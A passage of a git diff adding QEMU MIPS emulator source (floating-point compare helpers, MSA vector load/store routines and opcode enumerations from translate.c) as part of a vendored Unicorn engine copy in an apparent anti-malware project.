&env->active_fpu.fp_status)) +FOP_COND_S(lt, float32_lt(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(nge, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(le, float32_le(fst0, fst1, &env->active_fpu.fp_status)) +FOP_COND_S(ngt, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status)) + +#define FOP_COND_PS(op, condl, condh) \ +void helper_cmp_ps_ ## op(CPUMIPSState *env, uint64_t fdt0, \ + uint64_t fdt1, int cc) \ +{ \ + uint32_t fst0, fsth0, fst1, fsth1; \ + int ch, cl; \ + fst0 = fdt0 & 0XFFFFFFFF; \ + fsth0 = fdt0 >> 32; \ + fst1 = fdt1 & 0XFFFFFFFF; \ + fsth1 = fdt1 >> 32; \ + cl = condl; \ + ch = condh; \ + update_fcr31(env, GETPC()); \ + if (cl) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ + if (ch) \ + SET_FP_COND(cc + 1, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc + 1, env->active_fpu); \ +} \ +void helper_cmpabs_ps_ ## op(CPUMIPSState *env, uint64_t fdt0, \ + uint64_t fdt1, int cc) \ +{ \ + uint32_t fst0, fsth0, fst1, fsth1; \ + int ch, cl; \ + fst0 = float32_abs(fdt0 & 0XFFFFFFFF); \ + fsth0 = float32_abs(fdt0 >> 32); \ + fst1 = float32_abs(fdt1 & 0XFFFFFFFF); \ + fsth1 = float32_abs(fdt1 >> 32); \ + cl = condl; \ + ch = condh; \ + update_fcr31(env, GETPC()); \ + if (cl) \ + SET_FP_COND(cc, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc, env->active_fpu); \ + if (ch) \ + SET_FP_COND(cc + 1, env->active_fpu); \ + else \ + CLEAR_FP_COND(cc + 1, env->active_fpu); \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered_quiet() is still called. */ +FOP_COND_PS(f, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0), + (float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status), 0)) +FOP_COND_PS(un, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), + float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status)) +FOP_COND_PS(eq, float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_eq_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ueq, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_eq_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(olt, float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_lt_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ult, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_lt_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ole, float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_le_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ule, float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered_quiet(fsth1, fsth0, &env->active_fpu.fp_status) || float32_le_quiet(fsth0, fsth1, &env->active_fpu.fp_status)) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered() is still called. */ +FOP_COND_PS(sf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0), + (float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status), 0)) +FOP_COND_PS(ngle,float32_unordered(fst1, fst0, &env->active_fpu.fp_status), + float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status)) +FOP_COND_PS(seq, float32_eq(fst0, fst1, &env->active_fpu.fp_status), + float32_eq(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ngl, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_eq(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_eq(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(lt, float32_lt(fst0, fst1, &env->active_fpu.fp_status), + float32_lt(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(nge, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_lt(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_lt(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(le, float32_le(fst0, fst1, &env->active_fpu.fp_status), + float32_le(fsth0, fsth1, &env->active_fpu.fp_status)) +FOP_COND_PS(ngt, float32_unordered(fst1, fst0, &env->active_fpu.fp_status) || float32_le(fst0, fst1, &env->active_fpu.fp_status), + float32_unordered(fsth1, fsth0, &env->active_fpu.fp_status) || float32_le(fsth0, fsth1, &env->active_fpu.fp_status)) + +/* R6 compare operations */ +#define FOP_CONDN_D(op, cond) \ +uint64_t helper_r6_cmp_d_ ## op(CPUMIPSState * env, uint64_t fdt0, \ + uint64_t fdt1) \ +{ \ + uint64_t c; \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) { \ + return -1; \ + } else { \ + return 0; \ + } \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float64_unordered_quiet() is still called. */ +FOP_CONDN_D(af, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status), 0)) +FOP_CONDN_D(un, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status))) +FOP_CONDN_D(eq, (float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(ueq, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_eq_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(lt, (float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(ult, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(le, (float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(ule, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float64_unordered() is still called. */ +FOP_CONDN_D(saf, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status), 0)) +FOP_CONDN_D(sun, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status))) +FOP_CONDN_D(seq, (float64_eq(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sueq, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_eq(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(slt, (float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sult, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sle, (float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sule, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(or, (float64_le_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_le_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(une, (float64_unordered_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(ne, (float64_lt_quiet(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt_quiet(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sor, (float64_le(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_le(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sune, (float64_unordered(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) +FOP_CONDN_D(sne, (float64_lt(fdt1, fdt0, &env->active_fpu.fp_status) + || float64_lt(fdt0, fdt1, &env->active_fpu.fp_status))) + +#define FOP_CONDN_S(op, cond) \ +uint32_t helper_r6_cmp_s_ ## op(CPUMIPSState * env, uint32_t fst0, \ + uint32_t fst1) \ +{ \ + uint64_t c; \ + c = cond; \ + update_fcr31(env, GETPC()); \ + if (c) { \ + return -1; \ + } else { \ + return 0; \ + } \ +} + +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered_quiet() is still called. */ +FOP_CONDN_S(af, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status), 0)) +FOP_CONDN_S(un, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status))) +FOP_CONDN_S(eq, (float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(ueq, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_eq_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(lt, (float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(ult, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(le, (float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(ule, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) +/* NOTE: the comma operator will make "cond" to eval to false, + * but float32_unordered() is still called. */ +FOP_CONDN_S(saf, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status), 0)) +FOP_CONDN_S(sun, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status))) +FOP_CONDN_S(seq, (float32_eq(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sueq, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) + || float32_eq(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(slt, (float32_lt(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sult, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sle, (float32_le(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sule, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) + || float32_le(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(or, (float32_le_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_le_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(une, (float32_unordered_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(ne, (float32_lt_quiet(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt_quiet(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sor, (float32_le(fst1, fst0, &env->active_fpu.fp_status) + || float32_le(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sune, (float32_unordered(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) +FOP_CONDN_S(sne, (float32_lt(fst1, fst0, &env->active_fpu.fp_status) + || float32_lt(fst0, fst1, &env->active_fpu.fp_status))) + +/* MSA */ +/* Data format min and max values */ +#define DF_BITS(df) (1 << ((df) + 3)) + +/* Element-by-element access macros */ +#define DF_ELEMENTS(df) (MSA_WRLEN / DF_BITS(df)) + +void helper_msa_ld_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t rs, + int32_t s10) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + target_ulong addr = env->active_tc.gpr[rs] + (s10 << df); + int i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwd->b[i] = do_lbu(env, addr + (i << DF_BYTE), + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwd->h[i] = do_lhu(env, addr + (i << DF_HALF), + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwd->w[i] = do_lw(env, addr + (i << DF_WORD), + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = do_ld(env, addr + (i << DF_DOUBLE), + env->hflags & MIPS_HFLAG_KSU); + } + break; + } +} + +void helper_msa_st_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t rs, + int32_t s10) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + target_ulong addr = env->active_tc.gpr[rs] + (s10 << df); + int i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + do_sb(env, addr + (i << DF_BYTE), pwd->b[i], + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + do_sh(env, addr + (i << DF_HALF), pwd->h[i], + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + do_sw(env, addr + (i << DF_WORD), pwd->w[i], + env->hflags & MIPS_HFLAG_KSU); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + do_sd(env, addr + (i << DF_DOUBLE), pwd->d[i], + env->hflags & MIPS_HFLAG_KSU); + } + break; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate.c new file mode 100644 index 0000000..9a3ac9e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/translate.c @@ -0,0 +1,19748 @@ +/* + * MIPS32 emulation for qemu: main translation routines. + * + * Copyright (c) 2004-2005 Jocelyn Mayer + * Copyright (c) 2006 Marius Groeger (FPU operations) + * Copyright (c) 2006 Thiemo Seufer (MIPS32R2 support) + * Copyright (c) 2009 CodeSourcery (MIPS16 and microMIPS support) + * Copyright (c) 2012 Jia Liu & Dongxue Zhang (MIPS ASE DSP support) + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "tcg-op.h" +#include "exec/cpu_ldst.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +#define MIPS_DEBUG_DISAS 0 +//#define MIPS_DEBUG_SIGN_EXTENSIONS + +/* MIPS major opcodes */ +#define MASK_OP_MAJOR(op) (op & (((uint32_t)0x3F) << 26)) + +enum { + /* indirect opcode tables */ + OPC_SPECIAL = (0x00 << 26), + OPC_REGIMM = (0x01 << 26), + OPC_CP0 = (0x10 << 26), + OPC_CP1 = (0x11 << 26), + OPC_CP2 = (0x12 << 26), + OPC_CP3 = (0x13 << 26), + OPC_SPECIAL2 = (0x1C << 26), + OPC_SPECIAL3 = (0x1F << 26), + /* arithmetic with immediate */ + OPC_ADDI = (0x08 << 26), + OPC_ADDIU = (0x09 << 26), + OPC_SLTI = (0x0A << 26), + OPC_SLTIU = (0x0B << 26), + /* logic with immediate */ + OPC_ANDI = (0x0C << 26), + OPC_ORI = (0x0D << 26), + OPC_XORI = (0x0E << 26), + OPC_LUI = (0x0F << 26), + /* arithmetic with immediate */ + OPC_DADDI = (0x18 << 26), + OPC_DADDIU = (0x19 << 26), + /* Jump and branches */ + OPC_J = (0x02 << 26), + OPC_JAL = (0x03 << 26), + OPC_BEQ = (0x04 << 26), /* Unconditional if rs = rt = 0 (B) */ + OPC_BEQL = (0x14 << 26), + OPC_BNE = (0x05 << 26), + OPC_BNEL = (0x15 << 26), + OPC_BLEZ = (0x06 << 26), + OPC_BLEZL = (0x16 << 26), + OPC_BGTZ = (0x07 << 26), + OPC_BGTZL = (0x17 << 26), + OPC_JALX = (0x1D << 26), + OPC_DAUI = (0x1D << 26), + /* Load and stores */ + OPC_LDL = (0x1A << 26), + OPC_LDR = (0x1B << 26), + OPC_LB = (0x20 << 26), + OPC_LH = (0x21 << 26), + OPC_LWL = (0x22 << 26), + OPC_LW = (0x23 << 26), + OPC_LWPC = OPC_LW | 0x5, + OPC_LBU = (0x24 << 26), + OPC_LHU = (0x25 << 26), + OPC_LWR = (0x26 << 26), + OPC_LWU = (0x27 << 26), + OPC_SB = (0x28 << 26), + OPC_SH = (0x29 << 26), + OPC_SWL = (0x2A << 26), + OPC_SW = (0x2B << 26), + OPC_SDL = (0x2C << 26), + OPC_SDR = (0x2D << 26), + OPC_SWR = (0x2E << 26), + OPC_LL = (0x30 << 26), + OPC_LLD = (0x34 << 26), + OPC_LD = (0x37 << 26), + OPC_LDPC = OPC_LD | 0x5, + OPC_SC = (0x38 << 26), + OPC_SCD = (0x3C << 26), + OPC_SD = (0x3F << 26), + /* Floating point load/store */ + OPC_LWC1 = (0x31 << 26), + OPC_LWC2 = (0x32 << 26), + OPC_LDC1 = (0x35 << 26), + OPC_LDC2 = (0x36 << 26), + OPC_SWC1 = (0x39 << 26), + OPC_SWC2 = (0x3A << 26), + OPC_SDC1 = (0x3D << 26), + OPC_SDC2 = (0x3E << 26), + /* Compact Branches */ + OPC_BLEZALC = (0x06 << 26), + OPC_BGEZALC = (0x06 << 26), + OPC_BGEUC = (0x06 << 26), + OPC_BGTZALC = (0x07 << 26), + OPC_BLTZALC = (0x07 << 26), + OPC_BLTUC = (0x07 << 26), + OPC_BOVC = (0x08 << 26), + OPC_BEQZALC = (0x08 << 26), + OPC_BEQC = (0x08 << 26), + OPC_BLEZC = (0x16 << 26), + OPC_BGEZC = (0x16 << 26), + OPC_BGEC = (0x16 << 26), + OPC_BGTZC = (0x17 << 26), + OPC_BLTZC = (0x17 << 26), + OPC_BLTC = (0x17 << 26), + OPC_BNVC = (0x18 << 26), + OPC_BNEZALC = (0x18 << 26), + OPC_BNEC = (0x18 << 26), + OPC_BC = (0x32 << 26), + OPC_BEQZC = (0x36 << 26), + OPC_JIC = (0x36 << 26), + OPC_BALC = (0x3A << 26), + OPC_BNEZC = (0x3E << 26), + OPC_JIALC = (0x3E << 26), + /* MDMX ASE specific */ + OPC_MDMX = (0x1E << 26), + /* MSA ASE, same as MDMX */ + OPC_MSA = OPC_MDMX, + /* Cache and prefetch */ + OPC_CACHE = (0x2F << 26), + OPC_PREF = (0x33 << 26), + /* PC-relative address computation / loads */ + OPC_PCREL = (0x3B << 26), +}; + +/* PC-relative address computation / loads */ +#define MASK_OPC_PCREL_TOP2BITS(op) (MASK_OP_MAJOR(op) | (op & (3 << 19))) +#define MASK_OPC_PCREL_TOP5BITS(op) (MASK_OP_MAJOR(op) | (op & (0x1f << 16))) +enum { + /* Instructions determined by bits 19 and 20 */ + OPC_ADDIUPC = OPC_PCREL | (0 << 19), + R6_OPC_LWPC = OPC_PCREL | (1 << 19), + OPC_LWUPC = OPC_PCREL | (2 << 19), + + /* Instructions determined by bits 16 ... 20 */ + OPC_AUIPC = OPC_PCREL | (0x1e << 16), + OPC_ALUIPC = OPC_PCREL | (0x1f << 16), + + /* Other */ + R6_OPC_LDPC = OPC_PCREL | (6 << 18), +}; + +/* MIPS special opcodes */ +#define MASK_SPECIAL(op) MASK_OP_MAJOR(op) | (op & 0x3F) + +enum { + /* Shifts */ + OPC_SLL = 0x00 | OPC_SPECIAL, + /* NOP is SLL r0, r0, 0 */ + /* SSNOP is SLL r0, r0, 1 */ + /* EHB is SLL r0, r0, 3 */ + OPC_SRL = 0x02 | OPC_SPECIAL, /* also ROTR */ + OPC_ROTR = OPC_SRL | (1 << 21), + OPC_SRA = 0x03 | OPC_SPECIAL, + OPC_SLLV = 0x04 | OPC_SPECIAL, + OPC_SRLV = 0x06 | OPC_SPECIAL, /* also ROTRV */ + OPC_ROTRV = OPC_SRLV | (1 << 6), + OPC_SRAV = 0x07 | OPC_SPECIAL, + OPC_DSLLV = 0x14 | OPC_SPECIAL, + OPC_DSRLV = 0x16 | OPC_SPECIAL, /* also DROTRV */ + OPC_DROTRV = OPC_DSRLV | (1 << 6), + OPC_DSRAV = 0x17 | OPC_SPECIAL, + OPC_DSLL = 0x38 | OPC_SPECIAL, + OPC_DSRL = 0x3A | OPC_SPECIAL, /* also DROTR */ + OPC_DROTR = OPC_DSRL | (1 << 21), + OPC_DSRA = 0x3B | OPC_SPECIAL, + OPC_DSLL32 = 0x3C | OPC_SPECIAL, + OPC_DSRL32 = 0x3E | OPC_SPECIAL, /* also DROTR32 */ + OPC_DROTR32 = OPC_DSRL32 | (1 << 21), + OPC_DSRA32 = 0x3F | OPC_SPECIAL, + /* Multiplication / division */ + OPC_MULT = 0x18 | OPC_SPECIAL, + OPC_MULTU = 0x19 | OPC_SPECIAL, + OPC_DIV = 0x1A | OPC_SPECIAL, + OPC_DIVU = 0x1B | OPC_SPECIAL, + OPC_DMULT = 0x1C | OPC_SPECIAL, + OPC_DMULTU = 0x1D | OPC_SPECIAL, + OPC_DDIV = 0x1E | OPC_SPECIAL, + OPC_DDIVU = 0x1F | OPC_SPECIAL, + + /* 2 registers arithmetic / logic */ + OPC_ADD = 0x20 | OPC_SPECIAL, + OPC_ADDU = 0x21 | OPC_SPECIAL, + OPC_SUB = 0x22 | OPC_SPECIAL, + OPC_SUBU = 0x23 | OPC_SPECIAL, + OPC_AND = 0x24 | OPC_SPECIAL, + OPC_OR = 0x25 | OPC_SPECIAL, + OPC_XOR = 0x26 | OPC_SPECIAL, + OPC_NOR = 0x27 | OPC_SPECIAL, + OPC_SLT = 0x2A | OPC_SPECIAL, + OPC_SLTU = 0x2B | OPC_SPECIAL, + OPC_DADD = 0x2C | OPC_SPECIAL, + OPC_DADDU = 0x2D | OPC_SPECIAL, + OPC_DSUB = 0x2E | OPC_SPECIAL, + OPC_DSUBU = 0x2F | OPC_SPECIAL, + /* Jumps */ + OPC_JR = 0x08 | OPC_SPECIAL, /* Also JR.HB */ + OPC_JALR = 0x09 | OPC_SPECIAL, /* Also JALR.HB */ + /* Traps */ + OPC_TGE = 0x30 | OPC_SPECIAL, + OPC_TGEU = 0x31 | OPC_SPECIAL, + OPC_TLT = 0x32 | OPC_SPECIAL, + OPC_TLTU = 0x33 | OPC_SPECIAL, + OPC_TEQ = 0x34 | OPC_SPECIAL, + OPC_TNE = 0x36 | OPC_SPECIAL, + /* HI / LO registers load & stores */ + OPC_MFHI = 0x10 | OPC_SPECIAL, + OPC_MTHI = 0x11 | OPC_SPECIAL, + OPC_MFLO = 0x12 | OPC_SPECIAL, + OPC_MTLO = 0x13 | OPC_SPECIAL, + /* Conditional moves */ + OPC_MOVZ = 0x0A | OPC_SPECIAL, + OPC_MOVN = 0x0B | OPC_SPECIAL, + + OPC_SELEQZ = 0x35 | OPC_SPECIAL, + OPC_SELNEZ = 0x37 | OPC_SPECIAL, + + OPC_MOVCI = 0x01 | OPC_SPECIAL, + + /* Special */ + OPC_PMON = 0x05 | OPC_SPECIAL, /* unofficial */ + OPC_SYSCALL = 0x0C | OPC_SPECIAL, + OPC_BREAK = 0x0D | OPC_SPECIAL, + OPC_SPIM = 0x0E | OPC_SPECIAL, /* unofficial */ + OPC_SYNC = 0x0F | OPC_SPECIAL, + + OPC_SPECIAL28_RESERVED = 0x28 | OPC_SPECIAL, + OPC_SPECIAL29_RESERVED = 0x29 | OPC_SPECIAL, + OPC_SPECIAL39_RESERVED = 0x39 | OPC_SPECIAL, + OPC_SPECIAL3D_RESERVED = 0x3D | OPC_SPECIAL, +}; + +/* R6 Multiply and Divide instructions have the same Opcode + and function field as legacy OPC_MULT[U]/OPC_DIV[U] */ +#define MASK_R6_MULDIV(op) (MASK_SPECIAL(op) | (op & (0x7ff))) + +enum { + R6_OPC_MUL = OPC_MULT | (2 << 6), + R6_OPC_MUH = OPC_MULT | (3 << 6), + R6_OPC_MULU = OPC_MULTU | (2 << 6), + R6_OPC_MUHU = OPC_MULTU | (3 << 6), + R6_OPC_DIV = OPC_DIV | (2 << 6), + R6_OPC_MOD = OPC_DIV | (3 << 6), + R6_OPC_DIVU = OPC_DIVU | (2 << 6), + R6_OPC_MODU = OPC_DIVU | (3 << 6), + + R6_OPC_DMUL = OPC_DMULT | (2 << 6), + R6_OPC_DMUH = OPC_DMULT | (3 << 6), + R6_OPC_DMULU = OPC_DMULTU | (2 << 6), + R6_OPC_DMUHU = OPC_DMULTU | (3 << 6), + R6_OPC_DDIV = OPC_DDIV | (2 << 6), + R6_OPC_DMOD = OPC_DDIV | (3 << 6), + R6_OPC_DDIVU = OPC_DDIVU | (2 << 6), + R6_OPC_DMODU = OPC_DDIVU | (3 << 6), + + R6_OPC_CLZ = 0x10 | OPC_SPECIAL, + R6_OPC_CLO = 0x11 | OPC_SPECIAL, + R6_OPC_DCLZ = 0x12 | OPC_SPECIAL, + R6_OPC_DCLO = 0x13 | OPC_SPECIAL, + R6_OPC_SDBBP = 0x0e | OPC_SPECIAL, + + OPC_LSA = 0x05 | OPC_SPECIAL, + OPC_DLSA = 0x15 | OPC_SPECIAL, +}; + +/* Multiplication variants of the vr54xx. */ +#define MASK_MUL_VR54XX(op) MASK_SPECIAL(op) | (op & (0x1F << 6)) + +enum { + OPC_VR54XX_MULS = (0x03 << 6) | OPC_MULT, + OPC_VR54XX_MULSU = (0x03 << 6) | OPC_MULTU, + OPC_VR54XX_MACC = (0x05 << 6) | OPC_MULT, + OPC_VR54XX_MACCU = (0x05 << 6) | OPC_MULTU, + OPC_VR54XX_MSAC = (0x07 << 6) | OPC_MULT, + OPC_VR54XX_MSACU = (0x07 << 6) | OPC_MULTU, + OPC_VR54XX_MULHI = (0x09 << 6) | OPC_MULT, + OPC_VR54XX_MULHIU = (0x09 << 6) | OPC_MULTU, + OPC_VR54XX_MULSHI = (0x0B << 6) | OPC_MULT, + OPC_VR54XX_MULSHIU = (0x0B << 6) | OPC_MULTU, + OPC_VR54XX_MACCHI = (0x0D << 6) | OPC_MULT, + OPC_VR54XX_MACCHIU = (0x0D << 6) | OPC_MULTU, + OPC_VR54XX_MSACHI = (0x0F << 6) | OPC_MULT, + OPC_VR54XX_MSACHIU = (0x0F << 6) | OPC_MULTU, +}; + +/* REGIMM (rt field) opcodes */ +#define MASK_REGIMM(op) MASK_OP_MAJOR(op) | (op & (0x1F << 16)) + +enum { + OPC_BLTZ = (0x00 << 16) | OPC_REGIMM, + OPC_BLTZL = (0x02 << 16) | OPC_REGIMM, + OPC_BGEZ = (0x01 << 16) | OPC_REGIMM, + OPC_BGEZL = (0x03 << 16) | OPC_REGIMM, + OPC_BLTZAL = (0x10 << 16) | OPC_REGIMM, + OPC_BLTZALL = (0x12 << 16) | OPC_REGIMM, + OPC_BGEZAL = (0x11 << 16) | OPC_REGIMM, + OPC_BGEZALL = (0x13 << 16) | OPC_REGIMM, + OPC_TGEI = (0x08 << 16) | OPC_REGIMM, + OPC_TGEIU = (0x09 << 16) | OPC_REGIMM, + OPC_TLTI = (0x0A << 16) | OPC_REGIMM, + OPC_TLTIU = (0x0B << 16) | OPC_REGIMM, + OPC_TEQI = (0x0C << 16) | OPC_REGIMM, + OPC_TNEI = (0x0E << 16) | OPC_REGIMM, + OPC_SYNCI = (0x1F << 16) | OPC_REGIMM, + + OPC_DAHI = (0x06 << 16) | OPC_REGIMM, + OPC_DATI = (0x1e << 16) | OPC_REGIMM, +}; + +/* Special2 opcodes */ +#define MASK_SPECIAL2(op) MASK_OP_MAJOR(op) | (op & 0x3F) + +enum { + /* Multiply & xxx operations */ + OPC_MADD = 0x00 | OPC_SPECIAL2, + OPC_MADDU = 0x01 | OPC_SPECIAL2, + OPC_MUL = 0x02 | OPC_SPECIAL2, + OPC_MSUB = 0x04 | OPC_SPECIAL2, + OPC_MSUBU = 0x05 | OPC_SPECIAL2, + /* Loongson 2F */ + OPC_MULT_G_2F = 0x10 | OPC_SPECIAL2, + OPC_DMULT_G_2F = 0x11 | OPC_SPECIAL2, + OPC_MULTU_G_2F = 0x12 | OPC_SPECIAL2, + OPC_DMULTU_G_2F = 0x13 | 